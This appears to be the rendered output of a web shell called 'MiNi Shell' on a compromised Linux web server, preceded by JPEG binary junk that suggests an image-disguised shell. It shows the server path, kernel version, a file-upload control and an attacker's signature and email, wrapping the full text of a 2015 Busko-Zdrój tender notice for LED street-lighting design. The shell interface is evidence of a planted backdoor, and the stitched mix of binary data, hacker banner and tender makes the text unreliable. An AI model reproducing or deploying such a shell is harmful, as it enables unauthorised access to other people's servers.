JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150330/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150330/69880-N-2015.html

<p class="kh_header"><b>Busko-Zdrój: Opracowanie dokumentacji technicznej dla zadania pn.:
* Budowa oświetlenia ulicznego na terenie gminy Busko-Zdrój*
dofinansowanej w ramach programu priorytetowego System Zielonych Inwestycji - *SOWA* 
z Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej.</b><br>
<b>Numer ogłoszenia: 69880 - 2015; data zamieszczenia: 30.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy , ul. Adama Mickiewicza 10, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3705200, faks 041 3705290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.busko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji technicznej dla zadania pn.:
* Budowa oświetlenia ulicznego na terenie gminy Busko-Zdrój*
dofinansowanej w ramach programu priorytetowego System Zielonych Inwestycji - *SOWA* 
z Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1. Przedmiotem zamówienia jest:
1.1.1 Usługa polegająca na opracowaniu dokumentacji technicznej,  budowlano - wykonawczej dla zadania pn: 
* Budowa oświetlenia ulicznego na terenie gminy Busko-Zdrój*
obejmującej:
a) Przebudowa drogi wojewódzkiej nr 973 w miejscowości Radzanów polegająca na budowie linii napowietrznej oświetlenia drogowego. 
b) Przebudowa drogi powiatowej nr 0087T w miejscowości Radzanów polegająca na budowie linii napowietrznej oświetlenia drogowego. 
c) Przebudowa drogi krajowej nr 73 w miejscowości Żerniki Górne polegająca na budowie linii napowietrznej oświetlenia drogowego.
d) Przebudowa drogi powiatowej nr 0059T w miejscowości Podgaje polegająca na budowie linii napowietrznej oświetlenia drogowego. 

ad a). 
Projekt budowlany obejmujący zakresem budowę linii napowietrznej oświetlenia drogowego długość projektowanego odcinka około 550 m. (usytuowanie nowych słupów oświetleniowych wraz z montażem opraw drogowych, stacja transformatorowa Radzanów I).   
ad b). 
Projekt budowlany obejmujący zakresem budowę linii napowietrznej oświetlenia drogowego długość projektowanego odcinka około 380 m. (usytuowanie nowych słupów oświetleniowych wraz z montażem opraw drogowych, stacja transformatorowa Radzanów III).   
ad c). 
Projekt budowlany obejmujący zakresem budowę linii napowietrznej oświetlenia drogowego długość projektowanego odcinka około 320 m. (usytuowanie nowych słupów oświetleniowych wraz z montażem opraw drogowych, stacja transformatorowa Żerniki Górne II).   
ad d). 
Projekt budowlany obejmujący zakresem budowę linii napowietrznej oświetlenia drogowego długość projektowanego odcinka około 300 m. (usytuowanie nowych słupów oświetleniowych wraz z montażem opraw drogowych, stacja transformatorowa Podgaje II).   
  
1.2. Zakres prac projektowych
1.W zakresie prac projektowych należy wykonać:
a) wykonanie w skali 1:500 numerycznych podkładów sytuacyjno - wysokościowych lub  	aktualizację istniejących podkładów dla obszaru na którym zlokalizowane jest 	projektowane oświetlenie,
b) wykonanie projektów zagospodarowania terenu na aktualnych mapach, przyjętych do 	zasobów Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej w 	Busku- Zdroju z naniesionymi liniami rozgraniczającymi pas drogowy,
c) opracowanie projektów przebudowy (przełożenia) ewentualnych kolizji projektowanego oświetlenia z istniejącymi elementami uzbrojenia podziemnego i 	nadziemnego,
d) przygotowanie kompletnych materiałów do uzyskania decyzji o lokalizacji inwestycji 	celu publicznego (jeżeli taka decyzja jest wymagana),
e) uzyskanie wszystkich decyzji, uzgodnień, opinii niezbędnych dla zatwierdzenia 	dokumentacji przez właściwy organ oraz możliwości uzyskania pozwolenia na 	budowę lub potwierdzenia zgłoszenia robót (w przypadku gdy nie jest wymagane uzyskanie pozwolenia na budowę),
f) uzyskanie wszystkich opinii, uzgodnień i pozwoleń wymaganych przepisami szczególnymi, 
g) opracowanie kompletnego projektu budowlanego wykonawczego w 5 jednobrzmiących egzemplarzach + wersja elektroniczna dokumentacji do zamieszczenia na stronie internetowej UMiG  Busko-Zdrój,
h) uzgodnienie projektu budowlanego z Zespołem Uzgadniania Dokumentacji Projektowej w Starostwie Powiatowym w Busku-Zdroju,
i) pozyskanie pisemnych zgód właścicieli posesji w przypadku konieczności zajęcia 	części ich działek pod inwestycję,
j) opracowanie szczegółowej specyfikacji technicznej wykonania i odbioru robót w 1 	egz. + wersja elektroniczna,
k) opracowanie przedmiarów robót w 2 egz. + wersja elektroniczna,
l) opracowanie kosztorysów inwestorskich w 2 egz. + wersja elektroniczna,
m) opracowanie oceny oddziaływania na środowisko inwestycji mogących pogorszyć stan środowiska - jeżeli zaistnieje konieczność sporządzenia takiego opracowania,
n) w przypadku braku możliwości określenia parametrów technicznych materiałów lub 	urządzeń przy nazwie producenta należy umieścić sformułowanie: *lub równoważne o 	parametrach nie gorszych niż*.  
o) projekt winien być opracowany i sprawdzony przez osoby posiadające
   uprawnienia do projektowania i należących do właściwej branżowo izby,  
 p) uzyskaniu na własny koszt mapy do celów projektowych; wszystkie dokumenty w 	formie   elektronicznej (płyta CD, CD-R) należy przekazać w  wersji źródłowej w 	programie,w którym zostały utworzone oraz wydruki do formatu pdf.

UWAGA! Wszystkie dokumenty, które będą występowały w oryginale należy umieścić w   egzemplarzu nr 1.

2. Dokumentację techniczną należy opracować w oparciu o koncepcyjne rozwiązania  zaproponowane przez Projektanta, po uzyskaniu akceptacji Zamawiającego. 
3.W cenie wykonania dokumentacji należy uwzględnić koszty związane z zakresem prac
   projektowych, w tym z:
a)  uzyskaniem wszystkich uzgodnień, opinii i pozwoleń niezbędnych do otrzymania:
     - decyzji o zezwoleniu na realizację inwestycji drogowej 
     - pozwolenia na budowę 
b) uzyskanie / aktualizację mapy do celów projektowych, 
c) koszty sporządzenia aktualizacji kosztorysów inwestorskich. Aktualizacja kosztorysów może
    nastąpić w przypadku ogłoszenia przetargu w terminie przekraczającym 6 m-cy od daty 
    opracowania kosztorysów.  
d) koszty nadzoru autorskiego w czasie realizacji inwestycji w ilości max. 3 wizyt na budowie 
    na pisemne wezwanie Inwestora (nie wynikających z wad projektu).
4. Wykonawca projektu sprawować będzie nadzór autorski (bez dodatkowego wynagrodzenia) w
    zakresie obejmującym w  szczególności:
    -  pisemnego udzielanie wyjaśnień i odpowiedzi na pytania oferentów na etapie ogłoszenia
       przetargu na wykonawstwo w terminie do 2 dni od ich przekazania przez Zamawiającego
    -  pisemnego wyjaśnienia Inwestorowi i Wykonawcy wątpliwości dotyczące projektu budowlano- 
       wykonawczego i zawartych w nim rozwiązań w terminie do 3 dni od ich przekazania przez
       Zamawiającego
    -  ewentualne uzupełnienie szczegółów dokumentacji projektowej budowlano-wykonawczej,
 5. Wszelkie prace projektowe lub czynności nie opisane wyżej a wynikające z procedur   
    określonych w przepisach szczególnych, niezbędne do właściwego i kompleksowego
    opracowania dokumentacji projektowej, należy traktować jako oczywiste i uwzględnić 
    w kosztach i terminach wykonania przedmiotu zamówienia.
6. Wszystkie dokumenty w formie elektronicznej należy przekazać:
-  w wersji źródłowej w programie, w którym zostały utworzone,
     -   w programie umożliwiającym wydruki w formacie pdf
     -   przedmiar robót jako arkusz kalkulacyjny Excel lub OpenOffice
   -   kosztorys inwestorski w programie Norma i PDF. Projektant zobowiązuje się do aktualizacji kosztorysu (na pisemne wezwanie Zamawiającego) co 6 miesięcy do czasu wyłonienia Wykonawcy robót,
      - 	na nośnikach (płyta CD, CD-R). 
7. Projektant ponosi pełną odpowiedzialność za wady i błędy projektowe ujawnione w 	okresie procedur administracyjnych, jak również ujawnione w toku wdrażania do realizacji przedmiotu umowy.
		Projektant odpowiada również za wady i błędy w przedmiarze robót, ujawnione podczas trwania procedury przetargowej na roboty budowlane, a w przypadku ich stwierdzenia, zobowiązuje się w wyznaczonym przez Zamawiającego terminie do wprowadzenia odpowiednich poprawek lub uzupełnień, bez dodatkowego wynagrodzenia.
	Projektant zobowiązuje się w wyznaczonym przez Zamawiającego terminie do udzielania wyczerpujących wyjaśnień na zadawane pytania przez Oferentów w trakcie trwania  procedury przetargowej na roboty budowlane, bez dodatkowego wynagrodzenia.
8. Do obowiązków Wykonawcy należy zaopatrzenie dzieła w pisemne oświadczenie, że dostarczona dokumentacja jest wykonana zgodnie z umową, obowiązującymi przepisami techniczno-budowlanymi i normami oraz, że jest kompletna z punktu widzenia celu, któremu ma służyć.

Przedmiot zamówienia obejmuje wykonanie wszelkich prac i czynności niezbędnych do prawidłowego zrealizowania przedmiotowego zamówienia w zakresie rzeczowym ujętym w niniejszej specyfikacji istotnych warunków zamówienia ( SIWZ) oraz wzorze umowy.

1.3. Wytyczne i uwagi zamawiającego:

1) Zamawiający informuje, że przy opracowaniu dokumentacji projektowej należy użyć opraw  oświetlenia typu LED o parametrach nie gorszych niż:

- oprawy powinny być wyposażone w stopniowy system redukcji mocy.
100% świecenia w godzinach do 23:00
70% świecenia w godzinach od 23:00 do 24:00
50% świecenia w godzinach od 24:00 do 5:00
70% świecenia w godzinach od 5:00 do 6:00
100% świecenia w godzinach od 6:00

- oprawa powinna legitymować się stopniem ochrony przed wnikaniem pyłu i wody nie mniejszym
  niż IP 66
- korpus oprawy wykonany z ciśnieniowego odlewu aluminiowego o bardzo wysokiej odporności   na uderzenia min. IK 08
- klosz oprawy powinien być wykonany z płaskiego, hartowanego szkła (odporności na uderzenia min. IK 08)
- w przypadku gdy oprawa wyposażona jest w zewnętrzny radiator rozpraszający ciepło emitowane przez diody LED, wymagane jest aby konstrukcja radiatora umożliwiała swobodne odprowadzanie wody i brudu osadzającego się na oprawie.
- trzpień mocujący oprawę powinien umożliwiać regulację nachylenia oprawy: przy montażu bezpośrednio na słupie: 0, +5, +10, przy montażu na wysięgniku: od -10, -5, 0. W sytuacji gdy oprawa nie posiada takiej możliwości wykonawca powinien zastosować inny sposób regulacji umożliwiający ustawienie oprawy pod odpowiednim kątem.
- elementy mocujące oprawę na słupie/wysięgniku ( śruby, podkładki ) powinny być wykonane ze stali nierdzewnej i gwarantować stabilny montaż
- oprawa powinna być wyposażona w panel LED w diody o emitowanej barwie światła: 3800 K 
4500 K i o wskaźniku oddawania barw Ra min. 70.
- oprawa musi mieć zaprogramowany fabrycznie tzw. miękki start do 20 sekund od momentu włączenia zasilania do osiągnięcia 100% mocy,
- panel LED powinien być wyposażony w kostkę przyłączeniową, która w razie awarii powinna umożliwiać jego szybką wymianę. Panel LED powinien stanowić integralną całość i nie być rozczłonkowany na pojedyncze moduły połączone ze sobą połączeniami lutowanym
- oprawy muszą posiadać dostępne bazy danych dla ogólnodostępnych programów obliczeniowych parametrów oświetleniowych 
- oprawy wykonane w II klasie ochronności
-oprawa powinna posiadać interfejs do sterowania sygnałami w standardzie analogowym 1-10 i cyfrowym według protokołu DALI
- możliwość wymiany zasilacza bez konieczności zdejmowania oprawy ze słupa
- współczynnik mocy przy mocy nominalnej *większe od* 0,9
- zakres temperatur pracy: -35 stopni C  *większe lub równe od* To *mniejsze lub równe od*  35 stopni C
- zakłócenia sieci elektrycznej THD  *mniejsze od*  20%
- oprawa powinna posiadać deklaracje zgodności CE i certyfikat ENEC
- minimalny okres gwarancji obejmujący sprawne działanie kompletnej oprawy oświetleniowej powinien wynosić 7 lat
- czas pracy źródeł światła, trwałość średnia min. 80 000 godzin.

 Zaprojektowane ciągi oświetleniowe powinny spełnić wymagania normy PN-EN 13201 dla danej klasy oświetleniowej drogi. Spełnienie normy powinno zostać potwierdzone obliczeniami w ogólnie dostępnym programie komputerowym do wspomagania obliczeń..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.31.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże wykonanie w okresie ostatnich 
3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 zamówienia polegającego na wykonaniu usługi projektowej w zakresie projektu budowy lub przebudowy linii energetycznej oświetlenia ulicznego. 

wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto do oferty należy dołączyć:
1. Wypełniony formularz ofertowy z wykorzystaniem wzoru wg Załącznika 1;
2. Pisemne zobowiązanie innych podmiotów, o których mowa w art. 26 ust. 2b Pzp, do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia, w przypadku, gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych tych podmiotów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 94</li>
<li>2 - Doświadczenie - 6</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące okoliczności i warunki zmiany postanowień zawartej umowy.
1. Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności.
2. Zmiana postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadku: 
a) wystąpienia ograniczenia zakresu przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, na skutek okoliczności,  których nie można było przewidzieć na etapie przygotowania inwestycji do realizacji,
b) wystąpienia nieistotnych zmian tj. zmian, które nie mają wpływu na tzw. konieczne warunki Umowy  (termin, zakres, wartość Umowy).
3. Zmiana terminu wykonania przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadkach gdy: 
a) opóźnienie terminu wykonania przedmiotu Umowy nie jest zależne od Wykonawcy  
    t.j.  Termin uzyskania wszelkich opinii, uzgodnień oraz decyzji administracyjnych. Termin ten zostaje wówczas  przedłużony o czas otrzymania w/w dokumentów;
b)  wystąpi konieczność uzyskania od organów administracji państwowej dodatkowych decyzji, uzgodnień, pozwoleń, niezbędnych do wykonania przedmiotu zamówienia
4. Zmiana zakresu rzeczowego umowy w stosunku do treści oferty, na podstawie dokonano wyboru    
    Wykonawcy, może nastąpić w przypadku wystąpienia okoliczności, których nie można było  
    przewidzieć na etapie przygotowania inwestycji do projektowania.
5. Zmiana wartości przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano                                wyboru Wykonawcy, może nastąpić w przypadkach
a) zmniejszenia zakresu rzeczowego Umowy,
b) urzędowych zmian w obowiązujących przepisach podatkowych, w tym zmiany podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umig.busko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Busku-Zdroju, ul. Mickiewicza 10, pok. Nr 36 c.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2015 godzina 12:00, miejsce: Urząd Miasta i Gminy w Busku-Zdroju, ul. Mickiewicza 10, pok. Nr 3 (Biuro Obsługi Interesanta)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com